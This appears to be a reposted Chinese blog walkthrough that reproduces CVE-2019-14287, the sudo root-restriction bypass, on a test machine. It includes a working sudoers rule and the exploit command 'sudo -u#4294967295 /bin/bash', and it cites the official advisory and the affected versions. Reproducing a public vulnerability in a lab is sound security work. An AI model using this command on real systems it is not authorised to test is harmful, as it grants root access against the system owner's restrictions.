码迷,mamicode.com
首页 > 系统相关 > 详细

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

时间:2019-10-15 18:58:08      阅读:105      评论:0      收藏:0      [点我收藏+]

标签:sudoer   测试   漏洞复现   user   nta   root   linu   ima   bsp   

1:查看测试机sudo版本号,确认是受影响版本。

技术图片


技术图片
2:创建账号test

技术图片

技术图片
3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加:

test  ALL=(ALL,!root) /bin/bash

技术图片

技术图片
技术图片
技术图片
4:登录test账号,
技术图片

技术图片

 

 sudo -u#4294967295 /bin/bash

技术图片

 

 

受影响的Sudo版本:

1.8.28之前的Sudo版本会受到影响。

=======================================
参考链接:
https://www.sudo.ws/alerts/minus_1_uid.html
https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

标签:sudoer   测试   漏洞复现   user   nta   root   linu   ima   bsp   

原文地址:https://www.cnblogs.com/SzSecNote/p/11679345.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!